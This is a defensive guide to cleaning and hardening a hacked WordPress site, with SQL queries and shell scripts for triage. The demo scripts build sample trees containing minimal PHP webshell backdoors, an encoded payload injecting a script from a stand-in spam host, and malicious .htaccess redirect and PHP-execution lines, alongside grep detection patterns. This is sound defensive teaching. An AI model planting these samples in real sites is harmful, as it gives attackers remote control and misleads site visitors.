Your WordPress site is showing ads for casino games, redirecting visitors to spam pages, or your host just suspended the account with a malware warning. Your site has been hacked. The good news: it is recoverable, and in most cases your content is intact.
This guide walks through every step of a WordPress hack recovery: identifying what was compromised, isolating the damage, cleaning files and the database, removing attacker-created admin users, and hardening the site so it does not happen again. Work through it in order and do not skip the hardening section at the end.
Step 1: Confirm You Are Hacked (Not Just Broken)
Before spending hours cleaning a hack that is not there, confirm the site is actually compromised. Common signs:
- Google shows a “This site may be hacked” warning under your listing in search results, or browsers show a Safe Browsing interstitial before loading the site
- Visitors are redirected to unrelated domains
- Your host suspended the account citing malware or abuse
- The admin dashboard shows users you did not create
- Google Search Console shows a security issue notification
- Pages contain links or ads you did not add
- Wordfence or Sucuri flagged suspicious file changes
If you have not run a scan yet, do that now. Install Wordfence Security (free) and run a full scan, or use Sucuri SiteCheck at sitecheck.sucuri.net which scans from the outside without needing plugin access.
Step 2: Put the Site in Maintenance Mode and Take a Backup
Before making any changes, take a backup of the current (infected) state. You will need it to reference specific files or database entries during the cleanup, and it is the evidence of how the attacker got in. If your host exposes web server access and error logs, copy those for the same period too; they are usually the only record of the request that planted the first file.
- Log into your host’s cPanel or server and download a full database backup via phpMyAdmin
- Download the entire wp-content folder via FTP or your host’s file manager
- Label the folder “infected-backup-2026” (add the date) and keep it offline for reference. Never put it back inside the web root: it contains live backdoors.
If your host provides staging or a file snapshot, take one now. This gives you a recovery point if you need to investigate specific malware behavior later.
Then put the site in maintenance mode to stop visitors from hitting infected pages while you clean:
# Add to the root .htaccess, above the "# BEGIN WordPress" block (remove after cleanup is complete).
# Replace 203.0.113.5 with your own public IP; the dots are escaped because the condition is a regex.
# Answering 503 instead of a 302 redirect tells search engines the outage is temporary.
ErrorDocument 503 /maintenance.html
RewriteEngine On
RewriteCond %{REMOTE_ADDR} !^203\.0\.113\.5$
RewriteCond %{REQUEST_URI} !^/maintenance\.html$
RewriteRule ^ - [R=503,L]
Step 3: Run a Full Malware Scan
Use at least two tools to scan for different malware signatures:
Wordfence
- Install and activate Wordfence Security from the plugin directory
- Go to Wordfence > Scan
- Click Start New Scan
- Review the results, prioritizing anything flagged as a modified or unknown core file, or as containing suspected malware
Command-line scan
If you have server access, the scan can be done with ordinary shell tools. Start with the uploads directory, a classic hiding spot because the web server can write to it:
find wp-content/uploads/ -name "*.php" -type f
find wp-content/ -name "*.ico" -type f -exec grep -l "<?php" {} + # PHP hidden behind an image extension and pulled in via include()
find . -name "eval-stdin.php" # shipped by old PHPUnit releases; reachable under the web root it is a remote code execution endpoint, not a webshell the attacker uploaded
Apart from the one-line index.php placeholders that some plugins and hosts drop into uploads subfolders to prevent directory listing (they contain only a comment such as “Silence is golden”), PHP files in the uploads directory should not exist. Anything else you find there is malware: keep a copy in the infected backup for reference, then delete it.
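The find commands above only look at file names. The script below is an added example and not part of the original guide: it extends them to file contents. It builds a small constructed wp-content tree (hypothetical paths and payloads), then reports PHP files under uploads/ that are not the empty placeholder, non-PHP files that contain a PHP open tag anywhere, and files carrying the obfuscation and webshell markers (eval with base64_decode/gzinflate/str_rot13, FilesMan) that the rest of this guide searches for. It assumes POSIX find/grep/sed; point scan_report at a real wp-content directory to use it for triage.

```sh
#!/bin/sh
# Added example (not from the original guide): content-based triage of a wp-content tree.
# Assumes POSIX find/grep/sed; paths and payloads below are constructed for the demo.

# Build a throwaway wp-content tree with one benign placeholder, one backdoor with a
# plausible name, one PHP payload hidden behind an .ico extension, and a clean plugin file.
make_sample_tree() {
    sample_root=$(mktemp -d)
    mkdir -p "$sample_root/uploads/2026/04" "$sample_root/plugins/hello-dolly"
    printf '<?php\n// Silence is golden.\n' > "$sample_root/uploads/index.php"
    printf '<?php @eval(base64_decode($_POST["x"]));\n' > "$sample_root/uploads/2026/04/wp-cache.php"
    printf '<?php if (isset($_GET["c"])) { system($_GET["c"]); }\n' > "$sample_root/uploads/2026/04/favicon.ico"
    printf 'GIF89a real image bytes\n' > "$sample_root/uploads/2026/04/real.gif"
    printf '<?php\n// Clean plugin code.\necho "Hello, Dolly";\n' > "$sample_root/plugins/hello-dolly/hello.php"
    echo "$sample_root"
}

# A file is a harmless placeholder if nothing is left after dropping the open tag,
# comment lines and blank lines. Plugins drop such index.php files into uploads/ to
# stop directory listing, so they must not be reported as malware.
is_placeholder() {
    ! grep -Ev '^[[:space:]]*(<\?php|//.*|#.*)?[[:space:]]*$' "$1" >/dev/null
}

# 1. PHP files under uploads/ that actually contain code.
php_in_uploads() {
    find "$1/uploads" -type f -name '*.php' | while read -r f; do
        is_placeholder "$f" || echo "$f"
    done
}

# 2. Files with a non-PHP extension that contain a PHP open tag anywhere (the .ico trick:
#    a loader elsewhere include()s the file, so the extension never matters). Readme
#    files that quote PHP show up too, so review the list rather than deleting blindly.
php_in_disguise() {
    find "$1" -type f ! -name '*.php' -exec grep -l '<?php' {} + 2>/dev/null || true
}

# 3. Obfuscation and webshell markers. base64_decode alone is common in clean plugins,
#    so it is only flagged next to eval/assert or together with the other decoders.
obfuscation_markers() {
    grep -rlE '(eval|assert)[[:space:]]*\(.*(base64_decode|gzinflate|str_rot13|gzuncompress)|FilesMan|preg_replace[[:space:]]*\(.*/e' "$1" || true
}

# One labelled report line per finding.
scan_report() {
    php_in_uploads "$1"      | sed 's|^|PHP in uploads: |'
    php_in_disguise "$1"     | sed 's|^|PHP hidden in non-PHP file: |'
    obfuscation_markers "$1" | sed 's|^|Obfuscation marker: |'
}

# Demo run against the constructed tree.
demo_root=$(make_sample_tree)
scan_report "$demo_root"
rm -rf "$demo_root"
```

On the constructed tree the report names wp-cache.php twice (PHP in uploads, obfuscation marker) and favicon.ico once, and stays silent on the placeholder index.php, the clean plugin file and the real image.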
Step 4: Remove Malicious Admin Users
Attackers frequently create an extra admin user as a backdoor so they can get back in after you patch the original hole. Check your user list:
- Go to Users > All Users
- Filter by Administrator role
- Delete any accounts you do not recognize
- Change the passwords of all remaining admin accounts immediately
If you cannot access the admin dashboard, check the database directly. Run this query even if you can log in: malware sometimes hooks the user list to hide its account, so the dashboard may not show it while the database does:
-- List all admin users. The meta_key carries the table prefix from wp-config.php
-- ($table_prefix): with the default prefix it is wp_capabilities, otherwise e.g. xyz_capabilities.
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u
INNER JOIN wp_usermeta m ON u.ID = m.user_id
WHERE m.meta_key = 'wp_capabilities'
AND m.meta_value LIKE '%administrator%'
ORDER BY u.user_registered DESC;
-- Delete a suspicious user (replace ID). Posts keep their post_author value, so review
-- or reassign them afterwards: SELECT ID, post_title FROM wp_posts WHERE post_author = 99;
DELETE FROM wp_users WHERE ID = 99;
DELETE FROM wp_usermeta WHERE user_id = 99;
Step 5: Reinstall WordPress Core
Replace all core WordPress files with a clean copy. This eliminates malware injected into wp-includes or wp-admin files without touching your content (which lives in wp-content and the database).
# Download fresh core (same version as your site; add --version=X.Y.Z to pin it)
wp core download --skip-content --force --allow-root
# Or via WP admin: Dashboard > Updates > Re-install WordPress
The --skip-content flag leaves wp-content alone, so your themes, plugins, and uploads are untouched. The --force flag overwrites the existing core files even when they match the installed version, which is what removes injected modifications. It does not delete extra files an attacker dropped into wp-admin or wp-includes; the checksum step below finds those. (--allow-root is only needed if you run WP-CLI as root, which is best avoided.)
After reinstalling core, verify file integrity:
wp core verify-checksums --allow-root
Any file reported as modified is still not pristine: download the original from WordPress.org and replace it manually. Files reported with “File should not exist” are not part of that WordPress release at all; they were added, so look at their content, keep a copy in the infected backup, and delete them.
Step 6: Clean Plugins and Themes
Plugins and themes are the most common infection vector. After cleaning core, clean your plugin and theme files:
- Deactivate all plugins
- Delete every plugin and reinstall from WordPress.org or from a purchased download
- Do not restore plugin files from the infected backup, they may contain backdoors
- For premium plugins, download fresh copies from the vendor’s account portal
- Do the same for themes: delete and reinstall from the original source
- Remove any plugins or themes you no longer use. Deactivated plugins with known vulnerabilities are still exploitable
Nulled (pirated) plugins and themes are another frequent infection vector: they routinely ship with the backdoor already built in. If you installed any plugin or theme from a source other than WordPress.org or the official vendor, remove it and do not reinstall it.
Step 7: Clean the Database
Attackers frequently inject malicious content into the database: spam links in post content, PHP or JavaScript payloads in wp_options (widget text, theme options, or a value that a loader file eval()s), the siteurl and home options pointed at an attacker domain to redirect the whole site, and hidden admin capabilities in usermeta.
Check wp_options for malicious values
-- Look for suspicious option values, and always eyeball the three options redirect hacks edit:
SELECT option_name, LEFT(option_value, 200) AS option_value
FROM wp_options
WHERE option_value LIKE '%eval(%'
OR option_value LIKE '%base64_decode%'
OR option_value LIKE '%gzinflate%'
OR option_value LIKE '%str_rot13%'
OR option_value LIKE '%<script%'
OR option_name IN ('siteurl', 'home', 'active_plugins');
Check post content for injected links
-- Find published posts with injected spam. The AND/OR mix needs parentheses,
-- otherwise the OR branches ignore the post_status filter:
SELECT ID, post_title, LEFT(post_content, 300)
FROM wp_posts
WHERE post_status = 'publish'
AND (post_content LIKE '%viagra%'
  OR post_content LIKE '%casino%'
  OR post_content LIKE '%payday loan%'
  OR post_content LIKE '%display:none%'
  OR post_content LIKE '%<script%');
For database spam links, the fastest cleanup is a search-and-replace over post content with WP Toolkit, the Better Search Replace plugin, or WP-CLI’s search-replace command. Do a dry run first and take a fresh database backup before the real run, because a careless pattern strips legitimate content just as easily.
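The queries above need a working database connection. If the site is suspended, or you would rather work from the infected backup taken in Step 2, the same checks can be run against the SQL dump. The script below is an added example, not part of the original guide: it constructs a small hypothetical dump (a wp_options row carrying an eval(base64_decode(...)) payload, a wp_posts row with a hidden casino link, and clean rows), flags the suspicious INSERT lines by table, and decodes every base64 payload so you can see what the injected code actually does instead of guessing from the first 200 characters. It assumes POSIX grep/sed and a coreutils-style base64 command.

```sh
#!/bin/sh
# Added example (not from the original guide): triage a mysqldump of a hacked site offline.
# Assumes POSIX grep/sed and coreutils base64; the dump below is constructed for the demo.

# Constructed sample dump. The payload is encoded at run time so the file is self-consistent.
make_sample_dump() {
    dump_file=$(mktemp)
    # What the attacker wants executed when a loader eval()s the option value.
    payload='echo "<script src=\"https://spam.example/r.js\"></script>";'
    b64=$(printf '%s' "$payload" | base64 | tr -d '\n')
    {
        printf "INSERT INTO wp_options VALUES (1,'siteurl','https://example.org','yes');\n"
        # mysqldump escapes quotes inside values as \' and the extractor has to cope with that.
        printf "INSERT INTO wp_options VALUES (412,'widget_text','a:1:{s:4:\"code\";s:99:\"<?php eval(base64_decode(\\\\'%s\\\\'));\";}','yes');\n" "$b64"
        printf "INSERT INTO wp_posts VALUES (7,'Hello world','<p>Welcome.</p><div style=\"display:none\"><a href=\"https://casino.example/\">best casino</a></div>','publish');\n"
        printf "INSERT INTO wp_posts VALUES (8,'About','<p>Plain page.</p>','publish');\n"
    } > "$dump_file"
    echo "$dump_file"
}

# Flag INSERT lines carrying PHP obfuscation or SEO spam, reported as line number, table,
# and the first 100 characters of the row.
suspicious_rows() {
    grep -nE 'eval[[:space:]]*\(|base64_decode|gzinflate|str_rot13|display:none|casino|viagra|payday' "$1" \
      | sed -E 's/^([0-9]+):INSERT INTO `?([A-Za-z0-9_]+)`? +VALUES +(.{0,100}).*/line \1 table \2: \3.../' || true
}

# Pull every string passed to base64_decode() (quoted with ', \' or ") and decode it.
decode_payloads() {
    grep -oE "base64_decode[[:space:]]*\\([\\\\'\"]+[A-Za-z0-9+/=]+" "$1" \
      | grep -oE '[A-Za-z0-9+/=]+$' \
      | while read -r blob; do
            echo "-- payload: $blob"
            printf '%s' "$blob" | base64 -d 2>/dev/null || echo "(not valid base64)"
            echo
        done
}

# Demo run; point both functions at your real dump to use them.
demo_dump=$(make_sample_dump)
suspicious_rows "$demo_dump"
decode_payloads "$demo_dump"
rm -f "$demo_dump"
```

On the constructed dump, suspicious_rows reports line 2 (wp_options) and line 3 (wp_posts) and ignores the siteurl row and the plain page; decode_payloads prints the decoded echo statement that injects the spam.example script tag.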
Step 8: Reset All Credentials
After cleaning files and the database, rotate every credential that could have been compromised:
- WordPress secret keys and salts, generate new ones at https://api.wordpress.org/secret-key/1.1/salt/ and paste into wp-config.php. This logs out all active sessions including the attacker’s if they have an active cookie.
- All admin passwords, change every administrator account password to a unique, long password (20+ characters)
- Database password, change in your hosting control panel and update wp-config.php to match
- FTP/SFTP credentials, change in your hosting panel
- Hosting panel password, change your cPanel or Plesk login password
# Reset a WordPress user password via WP-CLI. --prompt=user_pass asks for the value
# interactively, so the new password does not end up in your shell history:
wp user update admin --prompt=user_pass --allow-root
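If the server cannot reach api.wordpress.org, or you want the rotation scripted so it is repeatable, the keys can be generated locally. The script below is an added example, not part of the original guide: it writes a constructed wp-config.php (hypothetical values), replaces all eight AUTH/SECURE_AUTH/LOGGED_IN/NONCE keys and salts with fresh random strings read from /dev/urandom, leaves every other line untouched, and counts how many keys were rotated as a post-check. WordPress only requires these values to be long and unpredictable; any change to them invalidates every existing login cookie. It assumes /dev/urandom, coreutils base64 and a sed that supports -E.

```sh
#!/bin/sh
# Added example (not from the original guide): rotate the wp-config.php keys and salts offline.
# Assumes /dev/urandom and coreutils base64; the config file is constructed for the demo.

WP_SALT_KEYS="AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT"

# Constructed wp-config.php with the stock placeholder values.
make_sample_config() {
    cfg=$(mktemp)
    cat > "$cfg" <<'EOF'
<?php
define( 'DB_NAME', 'wp' );
define( 'DB_PASSWORD', 'do-not-touch-this-line' );
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );
$table_prefix = 'wp_';
EOF
    echo "$cfg"
}

# 64 random bytes, base64-encoded: 88 characters, never containing a quote, and safe
# inside the sed replacement below because the delimiter is | and base64 never emits & or |.
new_salt() {
    head -c 64 /dev/urandom | base64 | tr -d '\n'
}

# Rewrite each define('KEY', '...') line; every other line passes through unchanged.
# Writes to a temp file instead of using sed -i, which differs between GNU and BSD sed.
rotate_salts() {
    for key in $WP_SALT_KEYS; do
        salt=$(new_salt)
        sed -E "s|^define\( *'$key', *'[^']*' *\);|define('$key', '$salt');|" "$1" > "$1.tmp" \
            && mv "$1.tmp" "$1"
    done
}

# Post-check: how many of the eight keys now carry a long random value.
count_rotated() {
    n=0
    for key in $WP_SALT_KEYS; do
        if grep -qE "^define\( *'$key', *'[A-Za-z0-9+/=]{80,}'" "$1"; then n=$((n+1)); fi
    done
    echo "$n"
}

# Demo run against the constructed file.
demo_cfg=$(make_sample_config)
rotate_salts "$demo_cfg"
echo "rotated $(count_rotated "$demo_cfg") of 8 keys"
grep -E "^define\( *'(DB_PASSWORD|AUTH_KEY)'" "$demo_cfg"
rm -f "$demo_cfg"
```

Run it against the real wp-config.php only after the database credential rotation above, so you edit the file once, and keep the infected backup's copy for comparison.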
Step 9: Remove the .htaccess Backdoor and Check for Webshells
Attackers modify .htaccess to redirect visitors or give themselves persistent access. Download your .htaccess file and compare it to the default WordPress .htaccess:
# Default WordPress .htaccess (what it should look like):
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
Delete your current .htaccess and replace it with the default, then regenerate it via Settings > Permalinks > Save Changes. If you had legitimate custom rules (caching, redirects, security headers), re-add them from a known-good copy rather than from the infected file.
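Eyeballing a long .htaccess is error prone. The script below is an added example rather than part of the guide: it writes a constructed .htaccess containing the default WordPress block plus two typical attacker additions (a redirect keyed on the visitor's User-Agent so only crawlers see the spam, and an AddType line that makes .ico files execute as PHP), then prints every directive that sits outside the BEGIN/END WordPress markers and flags directives attackers favour wherever they appear. Lines reported outside the block are not automatically malicious, since caching and security plugins add their own blocks, so compare against a known-good copy. It assumes POSIX awk and grep.

```sh
#!/bin/sh
# Added example (not from the original guide): audit a WordPress .htaccess for attacker additions.
# Assumes POSIX awk/grep; the sample file is constructed for the demo.

make_sample_htaccess() {
    ht_file=$(mktemp)
    cat > "$ht_file" <<'EOF'
# Attacker addition 1: send search-engine and social crawlers elsewhere
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|facebook) [NC]
RewriteRule ^(.*)$ https://spam.example/landing [R=301,L]
# Attacker addition 2: make image files executable as PHP
AddType application/x-httpd-php .ico .png

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF
    echo "$ht_file"
}

# Every directive outside the "# BEGIN WordPress" ... "# END WordPress" markers, skipping
# blank lines and comments. Anything here was added by a plugin, by you, or by the attacker.
outside_wp_block() {
    awk '/^# BEGIN WordPress/ {inwp=1; next}
         /^# END WordPress/   {inwp=0; next}
         !inwp && $0 !~ /^[[:space:]]*(#|$)/ {print NR ": " $0}' "$1"
}

# Directives that rarely belong in a WordPress .htaccess and are staples of redirect hacks,
# backdoors (auto_prepend_file loads a PHP file before every request) and the
# "execute images as PHP" trick. Reported with line numbers, case-insensitively.
risky_directives() {
    grep -nEi 'auto_(prepend|append)_file|AddType.*php|AddHandler.*php|SetHandler.*php|ErrorDocument[[:space:]]+[0-9]+[[:space:]]+https?://|RewriteRule.*https?://|HTTP_(USER_AGENT|REFERER)' "$1" || true
}

audit_htaccess() {
    echo "== directives outside the WordPress block =="
    outside_wp_block "$1"
    echo "== risky directives =="
    risky_directives "$1"
}

# Demo run; point audit_htaccess at the site's real .htaccess to use it.
demo_ht=$(make_sample_htaccess)
audit_htaccess "$demo_ht"
rm -f "$demo_ht"
```

On the constructed file the first list holds the four attacker lines and nothing from the WordPress block; the second flags the User-Agent condition, the external redirect, and the AddType line.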
Also check for PHP webshells (files that give attackers a browser-based terminal into your server):
grep -rl "FilesMan" wp-content/ # signature of the WSO/FilesMan webshell family
grep -rlE "c99(sh|shell)|r57(sh|shell)" wp-content/ # older c99/r57 shells; the bare strings c99 and r57 alone produce too many false positives
grep -rlE "(eval|assert)[[:space:]]*\(.*(base64_decode|gzinflate|str_rot13)" wp-content/ | head -20 # base64_decode alone is common in clean plugins; flag it only next to eval
find wp-content/ -type f -name "*.php" -mtime -7 # PHP files changed in the last 7 days, whatever they are called
Step 10: Request Google to Re-Crawl (If Blacklisted)
If Google marked the site as dangerous in search results, you need to request a review after cleaning:
- Go to Google Search Console
- Navigate to Security & Manual Actions > Security Issues
- Click Request a Review
- Describe what was compromised, what you cleaned, and what you changed to prevent recurrence
- Submit the request
Reviews usually complete within a few days for sites flagged for malware; spam-related reviews can take longer. The “This site may be hacked” label is removed once Google confirms the site is clean. Do not request a review until the cleanup is finished and confirmed with a fresh scan: a request for a site that is still infected is simply rejected and you start over.
Step 11: Harden WordPress to Prevent the Next Hack
Cleaning is only half the job. If you do not fix the vulnerability that let the attacker in, reinfection is likely, often within days, because the same automated scanner will find the same hole again. Apply these hardening steps immediately after cleanup:
Update everything
Update WordPress core, all plugins, and all themes to current versions. Most hacks exploit known vulnerabilities in outdated software that has patches available.
Disable file editing from the admin
// Add to wp-config.php:
define('DISALLOW_FILE_EDIT', true); // removes the theme/plugin code editor from the dashboard
define('DISALLOW_FILE_MODS', true); // also blocks installing and updating plugins, themes and core from the dashboard;
                                     // set it only if you update via WP-CLI or your host, otherwise it fights the “update everything” step
Block PHP execution in uploads
# Add to wp-content/uploads/.htaccess (Apache 2.4 syntax; on Apache 2.2 use "Deny from all" instead).
# nginx ignores .htaccess entirely, so there you need an equivalent location rule in the server config.
<FilesMatch "\.(php|phtml|php[0-9]+)$">
Require all denied
</FilesMatch>
Enable two-factor authentication
Install a 2FA plugin (WP 2FA, Two Factor) and require it for all administrator accounts. Even if an attacker has your password, they cannot log in without the second factor.
Limit login attempts
Install Limit Login Attempts Reloaded or enable Wordfence’s brute force protection to block IP addresses after repeated failed login attempts.
For a complete 20-point security hardening checklist to run every month, see our WordPress security audit checklist which covers file permissions, login hardening, SSL configuration, and HTTP security headers.
When to Restore from Backup Instead of Cleaning
If the infection is deep, widespread, or you cannot identify all the modified files after running scans, restoring from a known-clean backup is faster and more reliable than manual cleanup.
You need a backup from before the hack date. Check your host’s backup history or your backup plugin logs to find a restore point that predates the infection. Our guide on how to restore your WordPress site from a backup covers five restore scenarios including restoring when the site is completely down.
If you restore from backup, you must also change all credentials (passwords, salts, database password) after the restore. The vulnerability that allowed the original hack still exists on the restored site until you patch it.
Common WordPress Hack Types and What to Look For
| Hack Type | What You See | Where to Clean |
|---|---|---|
| SEO spam injection | Hidden links to casino/pharma/loan sites in post content | Database wp_posts, wp_postmeta |
| Redirect hack | Visitors redirected to spam sites | .htaccess, wp-config.php, theme functions.php |
| Admin user backdoor | Unknown user in administrator role | wp_users, wp_usermeta |
| File-based webshell | PHP files in uploads or plugin directories | wp-content/uploads/, plugin folders |
| Crypto miner | High CPU on the server (server-side miner) or in visitors’ browsers (injected JavaScript miner) | Cron jobs and stray binaries on the server; injected script tags in theme or plugin files |
| Phishing page | Host suspended account, fake login page hosted on site | wp-content/uploads/ subdirectories |
Frequently Asked Questions
Will I lose my posts and pages if I clean the hack?
No. Your posts, pages, and media are in the database and the uploads folder. The cleanup process replaces core files and plugins but leaves wp-content intact. You may need to remove specific infected files from wp-content, but your actual content (posts, images, product data) is in the database and is preserved.
How did my site get hacked if I had a strong password?
Most WordPress hacks do not involve guessing passwords. The most common vectors are: a plugin or theme with a known security vulnerability, a nulled (pirated) plugin containing malware, compromised FTP credentials, or shared hosting cross-contamination. A strong admin password does not protect against plugin vulnerabilities.
Should I pay a malware removal service?
For complex or persistent infections, yes. Sucuri and Wordfence both offer paid cleanup services. Sucuri charges a flat annual fee that includes unlimited cleanups. This is worth it if the free scan keeps finding new malware after multiple cleanup attempts or if you lack server access to clean files manually.
How long does WordPress hack recovery take?
For a straightforward infection (one plugin was the entry point, limited file modification), 2 to 4 hours following this guide. For deep or multi-vector infections with database spam, 4 to 8 hours or a full day. If you have a clean backup from before the hack date, restoration is faster than manual cleanup for severe cases.
My host said the account is suspended. Can I still clean it?
Yes. Contact your host and ask for temporary SSH or FTP access to clean the files. Most hosts will grant this for a limited time. Clean all infected files, then email support with a summary of what you removed so they can verify and reactivate the account.
You Can Recover From This
A hacked WordPress site is alarming but it is not a catastrophe. Most hacks are opportunistic attacks targeting known vulnerabilities in outdated software. Clean the files, remove the rogue users, rotate all credentials, update everything, and apply the hardening steps. Your content is almost certainly still there.
The single most important thing you can do after recovery is set up automatic backups with off-site storage. If it happens again, you will have a clean restore point and the recovery time drops from hours to minutes.
Last modified: April 24, 2026